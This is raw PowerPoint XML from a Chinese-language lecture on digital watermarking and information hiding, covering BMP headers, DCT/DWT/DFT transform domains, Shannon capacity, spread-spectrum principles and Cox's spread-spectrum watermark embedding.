                <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" hangingPunct="0"/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27653" name="Rectangle 1099"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4572000" y="1498600"/>
            <a:ext cx="4248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kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件头部：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54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字节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0" y="2300288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文件头信息</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>包含</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>BMP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件的类型、</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>图像数据偏移地址、大小和打印格式等信息</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>；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714875" y="3670300"/>
            <a:ext cx="3786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位图头信息</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>包含</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>BMP</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="+mn-ea"/>
                <a:ea typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件的尺寸定义等信息 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" smtClean="0">
              <a:latin typeface="+mn-ea"/>
              <a:ea typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7176" name="Picture 4" descr="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71625"/>
            <a:ext cx="35242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18480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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>变换域算法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常用的变换域方法</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>离散余弦变换（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DCT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>离散小波变换（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DWT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>离散傅立叶变换（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>DFT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>）</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>…</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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扩频通信基本原理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香</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>农得出著名的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信道容量</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>计算公式：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𝑊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i="1" dirty="0" smtClean="0">
                    <a:latin typeface="Cambria Math"/>
                  </a:rPr>
                  <a:t>是</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" b="1" i="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Cambria Math"/>
                  </a:rPr>
                  <a:t>信道容量</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" b="1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𝑊</m:t>
                    </m:r>
                  </m:oMath>
                </a14:m>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>是信道带宽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是噪声功率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是信号功率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香农公式</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>表明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信道无误差传输信息的能力</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>与存在于信道中的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信噪比</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>以及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信道带宽</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>之间的关系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481" r="-1084" b="-6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31166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扩频通信基本原理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变换公式为：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1.44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0" i="1" smtClean="0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≪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时，用幂级数展开上式，略去高次项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𝑊</m:t>
                        </m:r>
                      </m:den>
                    </m:f>
                    <m:r>
                      <a:rPr lang="en-US" altLang="zh-CN" i="1">
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>=1.44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得出结论</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>：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给定信道容量</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>，可用不同的带宽和信噪比来传输信息。当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信噪比较小</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>时（干扰很强），可用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宽带系统</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>传输信息。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481" r="-1084" b="-15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52748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扩频通信基本原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean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b="1" dirty="0" smtClean="0"/>
              <a:t>扩频通信</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>即</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>扩展</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>频谱</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>通信</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>信号在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大于所需的带宽</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>内进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>传输</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>。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>
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>特点：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宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>占据频带很宽，每个频段上的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>能量很低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宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>即使几个频段的信号丢失，仍可以恢复信号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800" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>优势</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>：拦截概率小，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>抗干扰能力强</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000CC"/>
              </a:solidFill>
            </a:endParaRP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4874652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扩频通信基本原理</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean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</a:rPr>
              <a:t>将扩频通信的概念应用到隐蔽通信系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>中。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="宋体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</a:rPr>
              <a:t>隐蔽通信系统就是试图将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秘密信息扩展在整个载体中</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，以达到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000CC"/>
                </a:solidFill>
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>不可察觉</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>的目的，并且删除一小部分载体，也很难删除整个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="宋体" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>信息。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty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7091993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基于扩频思想的数字水印算法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Cox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>等人研究发现，在对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>感官质量影响最关键</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>（或对信号处理和攻击具有很好鲁棒性）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>的区域嵌入水印，将使水印系统具有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>较强鲁棒性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矛盾的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>是，嵌入带来的、对这些区域的修改，会导致载体感官质量下降。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>为了解决上述</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>矛盾，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
              <a:t>Cox</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>将</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>载体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变换域）</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>视为通信信道，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>将水印视为信道上传输的信号</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>，将传输过程中水印系统必须抵抗的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>处理（攻击）视为噪声</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t>。类比扩频通信技术，将水印以扩频的方式嵌入到载体最重要的频谱成分中。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84387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基于扩频思想的数字水印算法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水印嵌入</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>过程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产生服从正态分布的长度为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的随机序列作为水印</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                  <a:t>W</a:t>
                </a:r>
              </a:p>
              <a:p>
                <a:pPr lvl="1"/>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>选择载体图像</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" b="1" i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个最大的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DCT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系数</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                  <a:t>(T)</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>来嵌入水印，如下式：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1+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𝑖</m:t>
                    </m:r>
                    <m:r>
                      <a:rPr lang="en-US" altLang="zh-CN" b="0" i="1" smtClean="0">
                        <a:latin typeface="Cambria Math"/>
                      </a:rPr>
                      <m:t>=1⋯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对携带水印的系数</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>进行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DCT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逆变换</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" dirty="0" smtClean="0"/>
                  <a:t>得到水印载体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481" r="-1418" b="-27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-36512" y="116632"/>
            <a:ext cx="9289032" cy="3465676"/>
            <a:chOff x="-36512" y="116632"/>
            <a:chExt cx="9289032" cy="346567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6512" y="2336438"/>
              <a:ext cx="1468755" cy="124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2336438"/>
              <a:ext cx="1468755" cy="124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16632"/>
              <a:ext cx="1468755" cy="124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336438"/>
              <a:ext cx="1468755" cy="124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83765" y="2336438"/>
              <a:ext cx="1468755" cy="124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肘形连接符 14"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="7" idx="3"/>
              <a:endCxn id="8" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1432243" y="2959373"/>
              <a:ext cx="979517" cy="12700"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3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8" name="肘形连接符 17"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="8" idx="3"/>
              <a:endCxn id="10" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3880515" y="2959373"/>
              <a:ext cx="979517" cy="12700"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3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1" name="肘形连接符 20"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="10" idx="3"/>
              <a:endCxn id="13" idx="1"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="6328787" y="2959373"/>
              <a:ext cx="1454978" cy="12700"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3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5" name="肘形连接符 24"/>
            <p:cNvCxnSpPr>
              <a:stCxn id="9" idx="2"/>
              <a:endCxn id="10" idx="0"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm rot="5400000">
              <a:off x="5215454" y="1741458"/>
              <a:ext cx="973936" cy="216024"/>
            </a:xfrm>
            <a:prstGeom prst="bentConnector3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331640" y="2636912"/>
              <a:ext cx="1713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DCT(DFT</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
                <a:t>,</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>DWT)</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN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94210" y="2648907"/>
              <a:ext cx="171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关键系数</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN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17596" y="1475492"/>
              <a:ext cx="171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嵌入水印</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN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88224" y="2636912"/>
              <a:ext cx="1713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IDCT(IDFT</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" dirty="0" smtClean="0"/>
                <a:t>,IDWT)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895955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988840"/>
            <a:ext cx="6912768" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>离散余弦变换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>( Discrete Cosine Transform, DCT) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>是一种实数域变换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>其变换核</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>为实数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>的余弦函数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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>一幅图像进行离散余弦变换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>有这样的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>性质</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>许多有关</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>图像的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>重要可视信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>都集中在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>DCT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>变换的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>一小部分系数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>中。因此</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>离散余弦变换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>( DCT) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>是有损图像压缩</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>JPEG </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>核心</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>同时也是所谓“ 变换域信息隐藏算法”的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>主要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>“ 变换域</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>( DCT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>域</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>”之一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r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>因为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>图像处理运用二维离散余弦变换</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>所以在此我们</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>直接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>介绍</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>二维</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DCT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2200" dirty="0"/>
              <a:t>。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42655477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一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>M× N </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>矩阵</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>的二维</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0"/>
              <a:t>DCT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0"/>
              <a:t>定义如下</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0" smtClean="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
